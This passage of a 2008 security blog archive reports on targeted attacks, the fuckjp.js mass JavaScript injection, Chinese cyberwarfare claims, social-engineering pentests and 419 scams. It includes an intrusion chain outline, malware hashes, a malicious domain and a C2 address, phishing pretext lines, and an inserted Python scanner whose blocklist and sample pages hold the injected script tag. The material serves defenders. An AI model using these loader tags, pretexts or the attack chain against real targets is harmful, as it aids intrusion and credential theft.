  4. Less Enterprise Protection, more Enterprise Defense.
  5. Less Prevention, more Detection, Response, Disruption.
  6. Less Vulnerability Management, more System Integrity Analysis.
  7. Less Totality, more Sampling.
  8. Less Blacklisting, more Whitelisting.
  9. Use Infrequency/Rarity to our advantage.
  10. Use Blue and Red Teams to measure and validate.

  1. Attack the anti-virus/spam filter on the target company's mail transfer agent.
  2. Hook the AV to grab copies of all email. (Feeling good about that AV scanner now? Hey, it's defense in depth! Add more, you're secure! Not only does it not work 2/3 of the time, it's an avenue to be compromised! Argh.)
  3. Analyze email to understand the target.
  4. Inject forged email into ongoing thread between target and customer. Include malicious attachment.
  5. From target's computer, exploit DNS MSRPC vulnerability in target's PDC.
  6. Grab hashes, exploit other hosts. Find files of interest.
  7. Identify special network segmented from current network but accessed via USB drive.
  8. Modify USBDumper to acquire files when drive is moved from first network to special network.
  9. All interesting data transferred via Immunity's "PINK" C&C channel.

  • Sinan concluded by recommending we invest in human capital, not security products
  • Why we bother blocking anything but specific IPs outbound. All we've done by restricting outbound protocols is force everything to be SSL-encrypted HTTPS traffic
These are the bits I liked and wanted to keep track of. Read the three original articles for a complete view.
Okay, using AV to own the gateway, using social media as intelligence, using outbound ssl as covert channel, the need for user awareness, some of these sound familiar. ;-)

And don't forget to have a look at Richard's blog from time to time!! ;-)

Sunday

Another example of a targeted attack: Tibet protests. (UPDATED)

Maarten at the Internet Storm Center shows us another targeted attack. As usual, a social engineering part is involved and this time it's the protests in Tibet. He shows us the result of his ppt sample (reports_of_violence_in_tibet.ppt MD5 977a4ac91acf5d88044a68f828154155) submitted to virustotal and as we have seen before, it's not that good. Only five scanners out of 32 will detect it. F-Secure and McAfee did a similar analysis within the same context but with .chm files.

One of the possible new reasons why detection is deteriorating is the rise in use of custom packers. Sophos has an interesting article on it: Packer r(evolution).


Eddy from Wavci gives us some other details from this targeted attack (UPDATED):

The exploit silently runs a keylogger that collects and sends everything typed on the affected machine to a server running at xsz.8800.org. And 8800.org is a Chinese DNS-bouncer system that, while not rogue by itself, has been used in various targeted attacks. The vast majority of control servers were identified on Chinese netblocks. However, servers have been identified in the USA, South Korea and Taiwan. The host names pointing to these servers are often configured on dynamic DNS services such as 3322.org. While these services in themselves are not malicious, they are heavily used in these specific attacks.
According to Maarten, you should keep an eye out for the following files:
  • CHM Help files with embedded objects;
  • Acrobat Reader PDF exploits;
  • Microsoft Office exploits;
  • LHA files exploiting vulnerabilities in WinRAR;
  • Exploitation of an ActiveX component through an attached HTML file.
He also points to an article from Brian Krebs at the Washington Post.

According to a January article in Air Force Online, a series of e-mail attacks originating in China targeted 28 defense contractor locations in the United States late last year. The story named specific Beijing-based Internet addresses that the FBI later determined were the origin of the attacks.

Van Horenbeeck, who provides security and technical advice to several Tibetan groups, said he has uncovered evidence that those same numeric Internet addresses were used in targeted attacks against Students For a Free Tibet, another New York-based human rights group.

The attacks on pro-Tibet organizations are not the first to be tied to computers in China. The Washington Post reported March 21 that the FBI is investigating whether hackers in China targeted a group working for human rights in Darfur, the war-torn province of Sudan. China has economic and strategic interests in the African nation's oil fields.

Van Horenbeeck said the danger with the e-mail viruses involved in the attacks is that they are so hand-crafted and new that they usually go undetected by dozens of commercial anti-virus scanners on the market today.

"Last week, I had two of these samples that were detected by two out of 32 different anti-virus scanners, and another that was completely undetected," he said.

The specificity of information sought in the targeted attacks also suggests the attackers are searching for intelligence that might be useful or valuable to a group that wants to keep tabs on human rights groups, said Nathan Dorjee, a graduate student who provides technology support to Students for a Free Tibet. (Full article here.)


Especially this part was very interesting:

Dorjee said the attacks have been unsettling but ineffective, as the Students for a Free Tibet network mostly operates on more secure platforms, such as Apple computers and machines powered by open source operating systems.

"The fact that we're being attacked with the same resources thrown at multi-billion defense contractors is flattering," said Lhadon Tethong, executive director of Students for a Free Tibet. "It shows that we really are an effective thorn in the side of a repressive regime."


I wouldn't be overconfident about running on alternative OSes. As Dinis Cruz told me once, you can get equally owned on a Mac, but at least you get owned in style. ;-)

See: Apple Patches 93 Security Holes and Anti-virus on a Mac? (Washington Post).

Now there seems to be yet another 0-day vulnerability in Word. Or should I say through Word. From McAfee Avertlabs:

In several recent-yet limited-attacks, exploits were crafted to attack an MS Jet Database vulnerability through Word. The Word docs are coded to reference Access database files regardless of extension (which allows attackers to circumvent content filters looking for specific email attachment extensions).

An attack scenario looks like this:

  1. A user receives an email message with 2 attachments (one of which is a Word document)
  2. The email client saves the attachments to the same directory
  3. The user opens the Word document, which in turn opens the Access database containing the exploit code
Full article.


You can also find more information in the Microsoft Security Advisory (950627). Apparently, the guys at Microsoft are working during Easter weekend because of this.
Customers running Windows Server 2003 Service Pack 2, Windows Vista, and Windows Vista Service Pack 1 are not vulnerable to the buffer overrun being attacked, as they include a version of the Microsoft Jet Database Engine that is not vulnerable to this issue.

Customers using Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1 are vulnerable to these attacks.

In the last weeks, Zone-H released their statistics on web defacements and observed a large decrease for the first time in years. Now, this is not a good thing.

At that time and before, website defacement was mainly a Brazilian business where hundreds of Brazilian crackers groups were causing havoc to the web. They were all coordinating between each other using the most famous Brazilian IRC network, called Brasnet. One day in year 2005, the Brazilian police seized the logs of the conversations between the Brazilian defacers and started to distribute punishments to some of them. The reaction was quite immediate: most of the crews quit their own IRC Brasnet channels, some of them decided to quit defacing and some of them moved to different servers, trying to look for "secrecy" on private IRC servers.

Regardless, the path was already traced, defacing was maybe something funny to do for Brazilians but more interesting activities were profiling at the horizon, such as scamming, phishing, carding and banking. From hacking for fun, soon the Brazilian efforts were targeted to hacking for money. So much that today, there is no more activity in regards of defacements coming from Brazil. Sure, the Turks inherited the defacing business from the Brazilians; nowadays most of the website defaces are coming from the land of Ata Turk.


As I said in my last presentation, hacking for fun is fading out. It's all for the money now. So be safe and know your risks.

Previous posts:

Saturday

My blog's First Anniversary



I realized today that I have been blogging just over a year now. I started just after becoming a security consultant. It has been a blast. I went to a lot of conferences. I met a lot of interesting people, also in the digital world. I joined the Security Catalyst Community. I became a CISSP and CISA member. etc...
It all started with this first entry. Although reading all those rss feeds of mine takes a lot of time, I'm not giving up yet. I hope some people enjoyed the information I keep track of. I will be trying to add some tutorials of my own in the next year. Although, it might have to wait until I finish my postgraduate at Solvay Business School.

Anyway, up to the second year!!!!

The source code of the Javascript injection attack of last week



The Hacker webzine posted the source code of the fuckjp.js script used in the attacks of the last weeks. The JS malware exploits vulnerabilities in Windows, RealPlayer, and other applications and is heavily obfuscated. The bad guys have it, so why can't we all dissect it and learn about it. Here is a snippet:

Looking at presentations



Today was my second presentation, well, on presentation (techniques). After reading presentationzen, I have been trying to train my creative side and go for an innovative approach. It was very well received by my colleagues. Since there is so much to tell about presentations, I split it up into several sessions (today was nr. 1). I have been roaming slideshare.net looking for presentations that I like so I could compare them to my own. My presentations were not that technical until now. Since my colleagues sometimes have to give quite technical presentations, I was looking for an example that keeps the "zen" approach and still provides a lot of information. This one is as close as I could find:


The following were other presentations that I liked. I would change some things here and there but overall not bad. Some are quite different in design:
For more examples, visit my slideshare favorites page. You could also have a look at the following videos. They not only show slides, but also how someone presents them. These are absolutely my two favorites:

Friday

Podcast: AudioParasitics Episode 31: Highlights of McAfee's recent 'Sage 3' report



The latest AudioParasitics is out:

Episode 31 - Dave and Jim discuss the highlights of McAfee's recent 'Sage 3' report. In Sage 3, Avert Labs examines global malware trends. The report is based on data compiled by McAfee's international experts and examines the globalization of threats and the unique threats in different countries and regions.


And I totally missed out on the previous episodes:

Episode 30 - Microsoft Patch Tuesday Special Edition - MS08-014 - MS08-017 are discussed. Craig Schmugar joins Jim and Dave to discuss the security implications of each bulletin.

Episode 29: Part 2 of 2 - Dave and Jim are joined by George Heron (Chief Scientist at McAfee). In this series, we discuss intellectual property (patents), the current state of Mac security, and our old favorite - virtualization!
Episode 28: Microsoft Patch Tuesday Special Edition - MS08-008, MS08-009, MS08-110 and others are discussed. Craig Schmugar joins Jim to discuss the security implications of each bulletin.
Episode 27: Part 1 of 2 - Dave and Jim are joined by George Heron (Chief Scientist at McAfee). In this series, we discuss intellectual property (patents), the current state of Mac security, and our old favorite - virtualization!

Security.nl, Maarten, social engineering and targeted attacks



Security.nl did a 2-part article interviewing Maarten Van Horenbeeck. It's in Dutch, but you could try Babelfish or Google Translate. Maarten is an expert in targeted attacks and I have enjoyed his various blog articles on the subject. Not forgetting his excellent presentation at 24C3: Crouching Powerpoint, Hidden Trojan. He mentions a lot of points that we discussed before:

  • social engineering has become an important part of attacks
  • myspace, linkedin etc.... are providing social engineering material
  • targeted attacks are definitely on the rise
  • executive management is becoming a favorite target (spearphishing)
  • 0-day exploits are being used, especially in office documents (doc, ppt, xls etc)
  • Antivirus detection in these cases is very poor
Reading the two articles is highly recommended:
  1. Hyves helpt hackers bij gerichte aanvallen (Hyves helps hackers with targeted attacks) (security.nl)
  2. Als dodelijke PDF's je netwerk infiltreren (When deadly PDFs infiltrate your network) (security.nl)
BONUS: Spearphishing is back (SANS ISC)

Thursday

Social engineering pentesting against your employees (UPDATED)



One of the main points during my presentation at the security conference was that social engineering has become an important part of phishing or targeted attacks. You can patch your systems against vulnerabilities but you cannot patch your employees. (that would be a nice feature).
Results of user awareness sessions may not be perfect all the time. But what about pentesting as user awareness sessions? We do pentests against the infrastructure, but why don't we do it against the people? Not just to enhance normal pentests. Employees are as much part of the security process as the infrastructure. Some food for thought.
Anyway, here is a very interesting article from Lenny Zeltser: How to integrate social engineering into an information security assessment.

Research and design a scenario

You can get creative with scenarios that help achieve your goals, whether performing the test via email, phone, postal mail, instant messenger or in person. You will need to research the organization if you do not already understand its business, jargon, corporate hierarchy and social structure.

Next, you will need to think like an attacker, exploiting people's psychological inclinations such as:

  • People want something for nothing: "You won the office raffle! Click here to claim your gift."
  • People empathize with those in trouble: "Please reset my password. My boss will kill me if I don't submit the time sheet in time!"
  • People reciprocate a favor: You picked up the papers the person dropped; he holds the door to let you in.

Your scenario should specify the individuals or groups designated for social engineering, timing of the test, location, and persuasion tactics. Account for laws, contractual commitments, policies, and the company's culture. Also consider the possibility of something going wrong, and define back-out and escalation procedures.

Read full article. Note to self, I must bump up "The Art of Deception: Controlling the Human Element of Security" on my reading list.

Previous articles:
UPDATED: Johnny Long from ihackstuff.com has released a book: No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing (Amazon.com)

My Desktop Security Presentation

I didn't have much time to blog in the last couple of days. I got the opportunity to give a presentation at a local security conference. They were looking for someone to talk about desktop security. This was a perfect opportunity to set my newfound knowledge on presentation skills into practice. I didn't have any experience as a speaker so this was a nice first experience. The slides are quite graphical and you need me to complete the story. I got some positive feedback from the audience afterwards. I hope you like them as much and feel free to give some comments. Practice makes perfect and a journey of a thousand miles starts with one step. Here it is:



PS: I gave a demonstration of the winlockpwn tool using firewire and the crowd went wild.

Wednesday

The Hannaford (Delhaize) Breach, a new TJX case?



You couldn't have missed the news today on the Hannaford breach. While not as massive as the TJX case, it's still a notable breach. Hannaford doesn't ring a lot of bells in Belgium but they are part of the Delhaize group which is well known over here. One of the most interesting articles today was from Securosis: Picking Apart The Hannaford Breach- What Might Have Happened

According to multiple sources, the Hannaford Brothers grocery chain suffered a major breach with 4.2 million credit cards exposed. Hannaford had published an FAQ for their customers. Odds are it will be months until we find out what really happened, but I’m going to speculate anyway, pick apart the press coverage and FAQ, and see if we can learn something from this now.

As usual, the information released is incomplete and contradictory.

Google ads used to distribute malware



My fellow Belgian blogger Didier Stevens did a proof of concept last year in which he used Google ads in a little security experiment. It seems that malware writers really have started to use this as an infection method.

From McAfee Avertlabs:

One can even point the Google page ad to executable files (malware authors have started doing this), and the link will redirect and download the malware just fine. It’s kind of ironic given that Google is very strict about the kind of file attachments one can upload/download via their Gmail service.

http://www.google.com/pagead/iclk?…adurl=http://download.nai.com/…/win_xdatbeta.exe

The preceding example downloads a McAfee signature file in executable format.

Let's hope that Google will fix this problem asap.

Monday

USENIX security conference presentations are online


From USENIX:

The online proceedings are now available to USENIX members. The Best Papers are available and free to everyone. Also, check out the latest media coverage of USENIX Security '07.

Some examples:

Full listing here.

Saturday

Do we need user education?



The post "We Don’t Need No Education" from Securosis caught my eye. The discussion about User Education started after some articles from Rational Survivability: McGovern's "Ten Mistakes That CIOs Consistently Make That Weaken Enterprise Security" and Why Security Awareness Campaigns Matter. Additionally, the comments on the posts are interesting to follow.

From Securosis:

In an enterprise environment, user security training is not:

1. Telling users not to open emails from people they’ve never heard of
2. Telling users not to click on random links on web pages
3. Telling users to patch their own systems

Trying to make users change the way they interact with their tools is very challenging, and the very nature of viruses, phishing, and the like make it very challenging for users to correctly discern the difference between legitimate and hazardous emails and websites. So these are ideal problems for solving with technology. Awareness of the threats, however, is directly useful for users, as they are often the first people to notice issues and notify the helpdesk.

Good security training focuses on broader problems that don’t lend themselves to pure technology solutions. Training can be broken down into two major categories, General and Group-Specific. General security training is appropriate for all employees regardless of their job role. Group-Specific security training focuses on particular skills that are relevant to only a portion of the company.

Examples of General Security Training include:

1. Education on policies and procedures
2. Fire/Tornado Drills
3. What to do in an emergency, e.g., how to get 911 (or equivalent); how to contact on-site security
4. Locations of First Aid kits
5. Who to contact if you believe you have identified a security threat or risk
6. “If you see something, say something”
7. Not faxing/emailing organizational charts, phone lists, or other protected corporate information offsite
8. Rules for how to handle confidential information
9. Travel safety tip
Read the full post. Personally, I have always been an advocate of user education. Now finding the perfect formula, that's work in progress.

UPDATE (18/03/2007): Five Mistakes IT Groups Make When Training End-Users (CIO.com)

Video on harddisk encryption cold boot attack

Last month, a paper from Princeton University showed us how hard disk encryption was circumvented. Here is the demo video:

Attack of the Killer iframes and the javascript infections



At the beginning of the week, we saw a rise in iframe attacks. Now at the end of the week, it's time to review the entire story. It's hard to have missed all the different blogs and security centers reporting on it. Among the better known websites, Trendmicro joined the ranks of the victims.

1. The first iframe attacks led to a new site which enticed the user to install a new codec. A video provided by Avertlabs shows what an end user would see.


March 2008 - Mass Hack Demo from Schmooog on Vimeo.
--

Scanner results : 22% Scanner(8/36) found malware!

File Name : democodec1292.exe
File Size : 74823 byte
MD5 : 30965fdbd893990dd24abda2285d9edc
SHA1 : 53eacbb9cdf42394bd455d9bd2275f05730332f7
Downloader.Zlob.ZV; Trojan-Downloader.Win32.Zlob.eie; TrojanDownloader.Zlob.epx

As you can see, initial AV detection was not really good. But these needed user interaction to execute the code.

2. Another wave of MASSIVE web-based infection started this week as a javascript was injected into websites and led visitors to a malicious website hosted on 2117966.net. For this one, user interaction was not needed, and the site tries to exploit several vulnerabilities.

Two days ago, The Register talked of almost 23.000 infections. Just doing a google search for "script src http www.2117966.net fuckjp.js" reveals it's about 24.500 now. I advise you not to click through to those sites.

The malicious websites attempt to exploit the vulnerabilities described in MS06-014, MS07-004, MS06-067, MS06-057 and a number of ActiveX vulnerabilities:

  • Baofeng Storm ActiveX
  • Ourgame GLChat ActiveX
  • Microsoft Internet Explorer VML (VU#122084)
  • Qvod Player ActiveX
  • Microsoft RDS.Dataspace ActiveX (VU#234812)
  • RealPlayer playlist ActiveX (VU#871673)
  • Storm Player ActiveX
  • Microsoft Windows WebViewFolderIcon ActiveX (VU#753044)
  • Xunlei Thunder DapPlayer ActiveX
Shadowserver.org has some more information about how the Trojan works:

The trojan does not appear to do anything at all and makes no outbound connections if your machine is idle. However, if Internet Explorer is launched and makes a POST request involving a password field, the trojan will spring into action sending encrypted traffic to another server in China. The trojan appears to specifically look for password input tags (<input type="password">). It does not appear to send off POST data unless there is a password input tag. If it detects a qualifying POST request it will immediately begin sending encrypted traffic to a Chinese server at 61.188.39.175 on port 2034. It does not appear to be using DNS to find this IP address.

Malware Binary:

File MD5: dca9063dd1f1f5dfc4c313f0136114c2
File Size: 69632 bytes

Malware DLL:

File MD5: d24d9c46a79ba36d742a1f0b61ed9cc8
File Size: 45056 bytes

So you may have noticed that it pointed to a server in China. Hmmmm...... Also, the name of the script was fuckjp.js and we can guess what JP stands for. When looking for some information on the script, I found this piece through TheDarkVisitor, from the K'LLER blog:
After analyzing the script I remembered that these kinds of scripts are created by using some web attacker toolkit like MPack, FirePack, IcePack, WPack or AnnyPack, in which you just have to feed some info like the payload and place it on a compromised web server or a new one. But in this case it is VIP 2.74 from Chinese hackers. Latest version is 2.842.
No matter who wields it and what the origin of this malware is, take the necessary steps to protect yourself: install all your patches, avoid the use of ActiveX or Java where you can, or use mitigations such as kill bits or NoScript. Corporate networks might want to block traffic to www.2117966.net.
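If you want to check your own pages (or a crawl of them) for the injected loader, the Google query above is the quick way, but a small scanner is more reliable. The following is an added example, not code from this post, The Register or Shadowserver: it parses HTML, collects every remote load (script, iframe, embed, object) and flags those whose host is on a blocklist. Only the domain 2117966.net and the script name fuckjp.js come from the post; the blocklist structure and the sample pages are constructed for the example.

```python
# Added example, not code from the original post, The Register or Shadowserver.
# Scans HTML for remote loads whose host is on a blocklist. BAD_HOSTS holds the
# one domain named in the post; SAMPLE_PAGES are constructed for this example.
from html.parser import HTMLParser
from urllib.parse import urlsplit

BAD_HOSTS = {"2117966.net"}


def host_is_bad(host, bad_hosts=BAD_HOSTS):
    """True when host equals, or is a subdomain of, a blocklisted domain."""
    host = host.lower().rstrip(".")
    return any(host == bad or host.endswith("." + bad) for bad in bad_hosts)


class _RemoteLoadCollector(HTMLParser):
    """Collects the src/data attributes of tags that make the browser fetch code."""

    TAGS = {"script", "iframe", "embed", "object"}

    def __init__(self):
        super().__init__()
        self.loads = []  # (tag, src) in document order

    def handle_starttag(self, tag, attrs):
        if tag in self.TAGS:  # HTMLParser lower-cases tag and attribute names
            for name, value in attrs:
                if name in ("src", "data") and value:
                    self.loads.append((tag, value.strip()))


def find_injected_loads(html, bad_hosts=BAD_HOSTS):
    """Return (tag, src) for every remote load whose host is blocklisted.

    Absolute (http://host/...) and protocol-relative (//host/...) URLs are
    checked; relative paths load from the page's own origin and are skipped.
    """
    collector = _RemoteLoadCollector()
    collector.feed(html)
    hits = []
    for tag, src in collector.loads:
        if src.startswith("//"):
            url = "http:" + src
        elif "://" in src:
            url = src
        else:
            continue
        host = urlsplit(url).hostname
        if host and host_is_bad(host, bad_hosts):
            hits.append((tag, src))
    return hits


# Constructed sample pages: one carrying the injected tag, one clean, one with
# an upper-case, protocol-relative hidden IFRAME on the same domain.
SAMPLE_PAGES = {
    "infected": (
        '<html><head><title>shop</title>'
        '<script src="http://www.2117966.net/fuckjp.js"></script></head>'
        '<body><p>welcome</p></body></html>'
    ),
    "clean": (
        '<html><head><script src="/js/app.js"></script>'
        '<script src="https://cdn.example.org/lib.js"></script></head></html>'
    ),
    "hidden_iframe": (
        '<html><body><IFRAME SRC="//2117966.net/x.htm" width=0 height=0>'
        '</IFRAME></body></html>'
    ),
}


def scan_pages(pages=SAMPLE_PAGES, bad_hosts=BAD_HOSTS):
    """Map page name -> list of blocklisted loads found in it."""
    return {name: find_injected_loads(body, bad_hosts) for name, body in pages.items()}


if __name__ == "__main__":
    for name, hits in scan_pages().items():
        print(f"{name}: {hits or 'clean'}")
```

Keep in mind that a static parse only sees tags that are literally in the HTML. Loaders that build the tag at runtime with document.write() and split strings, which is how most kits of this type hide, only show up if you scan the page as the browser renders it, or if you watch proxy and DNS logs for the domain and for the C2 address Shadowserver lists.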


SecurityDistro.com 2.0



Josh from SecurityDistro left me a message saying that they have re-launched the site, which now allows user-generated security content. The goal is to lower the cost of training for people who need security knowledge by leveraging users' willingness to contribute content. I want to invite you to check out the new site and help contribute to the initiative.

The featured Security Distro list and the full list are on the site.

Friday

Nigerian scam statistics in Belgium


Ultrascan is an investigation group that keeps worldwide statistics on 419 Advance Fee Fraud.
This type of scam is named after the article of the Nigerian criminal code that covers it and is best known for the various social engineering tricks by which victims are lured into handing over sums of money. The scam artists, who are often based in Nigeria, contact their victims by spam and letters, but also through chatrooms, game forums and social networks.

In February, Ultrascan released their latest report: February 19 2008 version 1.7

Looking at the statistics, the number of 419 scam cases is only increasing. In Belgium, the number of active networks doubled to 14 in the last year. The scam artists managed to steal 25 billion euro in the 69 countries where the group keeps statistics.

The report mentions the Dutch Project Apollo as a good example of a police force that efficiently tackled 419 crime: they raided internet cafes in Amsterdam where Nigerians were conducting their 'business'. Their success is possibly one of the reasons why the number of cases in Belgium increased.

These statistics are only based on the information Ultrascan collected and are of course not the complete picture, but they give an idea.
419 AFF is not a cyber crime. It is mainly a confidence fraud using all communication resources available.

Misunderstandings on 419 AFF:

Most check and lottery fraud is Nigerian 419 AFF.

1. Lottery fraud (95% Nigerian advance fee scammers)
2. Check fraud (76% Nigerian advance fee scammers)
3. 419 advance fee fraud (97% Nigerian advance fee scammers)
4. Phishing (5% Nigerian advance fee scammers)
Read the report here.

See also the "The little black book of scams" from the Australian Competition and Consumer Commission (ACCC) .

Bonus: BEVEILIGING VAN DIGITALE INFORMATIE (Security of Digital Information), Comité van de Academie voor Wetenschappen en Techniek, 26 October 2007
This report describes the key issues related to the security of information as they are surfacing in our contemporary society. First it is argued that the realm of the protection, confidentiality, authenticity and integrity of information is more than ever an important item of concern. The wide access to information, the wide availability of ICT systems and their enormous applications, the fast transmission of data and information, and the ever increasing number of users worldwide, justify the attention of the entire network and society as a whole. The role of the different stakeholders, the government, the companies, the ICT service providers and the society and its citizens are situated within this framework. The juridical aspects constitute an important component. Many diverse application domains are specifically highlighted. Finally, actual and relevant technological methods are surveyed. The security of an information system is, like the strength of a chain, determined by the strength of its weakest link.
Bonus: Hoorzitting Internetveiligheid Parlement (parliamentary hearing on internet security)



The academy: online security instruction videos



The concept of this website is to support the security community with video based instruction on how to install, configure and troubleshoot some of today's most popular security technologies.


Videos available:

  • Check Point
  • Cisco
  • Nokia
  • FortiGate
  • TippingPoint
  • OSSEC
  • IronPort
  • Nessus
  • Nmap
  • SANS Institute
Visit the site here.

Thursday

Pecha Kucha Brussels Vol. 03



After Volume 2, there will be a third edition next week. The presentations are not all technology related, but Pecha Kucha is another format for giving presentations, one which can improve your creativity and presentation skills.

Spread the word. Share the world.
Pecha Kucha Brussels Vol. 03 calling.

Pecha Kucha, which is Japanese for the sound of conversation, is a series of show-and-tell evenings for designers, architects, artists and creatives, started by Klein Dytham architecture in Tokyo in 2003.

20 images x 20 seconds each.

Launched and organised by Alok Nandi, Architempo, as part of {creativity*conversation}, it attracts a wide audience.

Do register via http://pechakucha.architempo.net
Enjoy the presentations and the conversations.
Catering & bar on site

Speakers planned on March 20, 2008, are
_ Alexandra Deschamps-Sonsino, designswarm, tinker.it, London
_ Satinder Gill, Gesture and Multi-Modal Communication, UK
_ Luc Hoebeke retired and still searching, with
...Nirmala Isabelle Hoebeke, master in graphic arts
_ Francois Jegou, Sustainable Everyday Project, SDS
_ Maja Kuzmanovic, fo.am, media art & design
_ Arne Quinze, Quinze & Milan
_ Paolo Sacchettini - Torsen & car testing on frozen lakes
_ Sanjeev Shankar, architect/designer, street vending
_ Rob Van Kranenburg, RFID and cultural operator
_ Philippe Vandenbroeck, shiftn, scenario, photography
_ Olu Vandenbussche, design for the visually challenged
_ Danny Venlet, designer

Updates will be on http://pechakucha.architempo.net
See you there.
Pecha Kucha!
Best,

Alok NANDI

Collection of information on Cyberwarfare and the recent targeted attacks (updated)



Several interesting articles and papers have appeared in the last week, all concerning cyberwarfare capabilities and intrusions on the internet. Let's have a closer look at them.

First, I was reading 'The new art of War' (Washington Post). The following section caught my eye:

The Joint Information Operations Warfare Command, located at Lackland Air Force Base in Texas, integrates elements of electronic warfare, military deception, operations security and strategic communications to ensure that cyberspace is controlled and available to friendly forces for offensive and defensive uses.


I know that a lot of fingers are pointed at China and that the media can also be used as a tactic. The truth probably is that 'electronic warfare' is performed by both sides. But let's have a look at the information that is out there.

At the beginning of this week, the Pentagon released its Report to Congress on the Military Power of the People's Republic of China 2008. It was interesting to read the 66-page report, in which the Pentagon outlines the various techniques China employs to boost its use of technology.

But what we are interested in is the section on cyber capabilities:

"Cyberwarfare Capabilities. In the past year, numerous computer networks around the world, including those owned by the U.S. Government, were subject to intrusions that appear to have originated within the PRC. These intrusions require many of the skills and capabilities that would also be required for computer network attack. Although it is unclear if these intrusions were conducted by, or with the endorsement of, the PLA or other elements of the PRC government, developing capabilities for cyberwarfare is consistent with authoritative PLA writings on this subject.

• In 2007, the Department of Defense, other U.S. Government agencies and departments, and defense-related think tanks and contractors experienced multiple computer network intrusions, many of which appeared to originate in the PRC."

Note the last part mentions "appeared to originate in the PRC" (People's Republic of China).

Now, let's have another view on this: Chinese Perceptions of Traditional and Nontraditional Security Threats (pdf from strategicstudiesinstitute.army.mil)
That the report is written at all is seen as evidence of America's adherence to outdated and dangerous Cold War thinking, trying to paint China as the strategic rival that the Soviet Union once was. Major General Peng Guangqian of the Chinese People's Liberation Army's (PLA) Academy of Military Sciences noted that there have been only two instances where a government has publicly published reports on the military power of another country: the U.S. reports on the military strength of the former Soviet Union, and the current reports to Congress on China's military strength. He continues, "Cooking up this kind of report on the military power of the so-called major opponent or potentially major 'challenger' of the future reflects typical Cold War thinking."
While the report is no different from a standard intelligence assessment on foreign capabilities that most countries produce, its unclassified nature and broad distribution does make it unique. And the fact that the United States does not publish such assessments on any country besides China is telling about our own threat perceptions.

Commenting on the Pentagon’s “Cold War mentality” and continued propagation of the “China threat theory,” China’s Foreign Ministry spokesman noted that China was “strongly resentful and firmly opposed” to the report.
But let's get back to the hacking attempts that were reported last year and the tactics that were used. These attempts were not limited to the U.S., but included incidents in Germany, France and Britain.

If you look at the German intrusion, you can see that the attackers used Word documents to install Trojans in the network. The attacks on the Pentagon systems used the same tactic. That allowed the attackers to send spoofed emails that appeared to come from other Pentagon personnel, after which they managed to steal login credentials for the network, according to this article from Federal Computer Week.

It seems that social engineering is always an important part of the attack, combined with Office documents containing exploits. This is consistent with the tactics described by hackers like 'Wicked Rose':
Rose’s preferred method of attack is through social engineering and he says he has plenty of experience at it. First you get the sensitive information off the organization or institute’s public website. This period is called the collection stage. He notes that all the large companies maintain employee databases and that these contain the userids, passwords and mailboxes. Using the user’s identification you can search on the internet to find out where they go and what they do. It is important to do analysis on the userids of the major figures. It is possible to obtain their login and password at other sites they visit.

According to Rose, mailboxes are the most useful. You can get thousands of mailbox addresses from one database. Next, simply send out thousands of emails with Trojans attached and one or more of the employees is going to open it. (Source: The Dark Visitor).

The NCPH hacker group of which Wicked Rose is the leader, is known to have written several Word based exploit tools.

Yesterday, CNN.com also published an article on the hacker Xiao Chen. Note that there is also a video on top of the article.

But Xiao Chen says after the alleged Pentagon attack, his colleagues were paid by the Chinese government. Again, CNN has no way to independently confirm if that is true.

His allegations brought strenuous denials from Beijing. "I am telling you honestly, the Chinese government does not do such a thing," Qin said.

But if Xiao Chen is telling the truth, it appears his colleagues launched a freelance attack -- not initiated by Beijing, but paid for after the fact. "These hacker groups in my opinion are not agents of the Chinese state," says James Mulvenon from the Center for Intelligence Research and Analysis, which works with the U.S. intelligence community.

The Dark Visitor analyzed the video and found out the organization to which Xiao Chen belongs.

Next, I stumbled upon "Operational analysis of Chinese 'cyber army' penetration and recovery techniques" (spaces.icgpartners.com) dated 8 January 2008.
A wealth of information is gathered here, including the analysis of the following presentation on slideshare:


UPDATE: Some days after this post, the slides were removed. You can still download the screenshots here, and some of them are also displayed at TheDarkVisitor here (not all of them, though). The original poster on slideshare is unknown, as are his reasons for removing it now.

From the article:

The PowerPoint China Cyber Army documents a classic, highly organized Chinese IP attack/phishing pattern that we have seen previously but China Cyber Army is the first specific unclass description that we've seen on the recent spate of Chinese attacks against France (also here), UK (also here), Germany, the US, but to name a few.

A Taiwanese-American working in the US IT sector who graduated the same year in Taiwan as did the likely author, Chung-Ping Chen, or Charlie Chen, now at National Taiwan University, and has a number of Stanford and Taiwanese friends coming from the same class as Chen had this to say about the PPT: "Those are interesting slides, and probably a known secret for a lot of Taiwanese." These foils (slides) will come as bracing news to too many complacent US and EU corporations and defense entities who believe that they are not at risk at their desk on home soil.
This site has another fascinating article from 31 May 2007: Informationalization in Chinese military doctrine affects foreign commercial and military assets.

In the absence of a US counter-cyber warfare strategy, Chinese IT technologists enter all but the most secure US systems, exceeding the limits of passive examination and surveillance. Naval Network Warfare Command (Netwarcom) and others observe:

  • Chinese attacks "far outstrip other attackers in terms of volume, proficiency and sophistication, [the conflict having] reached the level of a campaign-style, force-on-force engagement"
  • "Motives of Chinese hackers run the gamut, including technology theft, intelligence gathering, exfiltration, research on DOD operations and the creation of dormant presences in DOD networks for future action"
  • Chinese employ complex, parallel attacks including using a virus plant "as a distraction and then come in "slow and low" to hide in a system while the monitors are distracted… spear phishing, sending deceptive mass e-mail messages to lure DOD users into clicking on a malicious URL, [and innovative implementations] of more traditional hacking methods, such as Trojan horse viruses and worms"
  • Attacks are so deliberate, "it’s hard to believe it’s not [Chinese] government-driven"
It's really worth reading. They also look back at the 2007, 2006 and 2005 versions of Military Power of the People's Republic of China. But take these reports from the Pentagon with a grain of salt: they are only one point of view on the whole story.

I believe there is a real threat. It doesn't matter who is behind it. What matters is that they are organized and committed to their task. Understanding their mindset and tactics is important and often overlooked.

If you are still thirsty for more information, have a look at the Dark Visitor blog. He has a wealth of information about the world of Chinese hackers. He also has a book, which I intend to buy this week. TaoSecurity already has a review of the book here.



UPDATE(13/03/2008): The Heritage Foundation also has an extensive article that dates from 8 Feb 2008: Trojan Dragon: China's Cyber Threat. An excerpt:
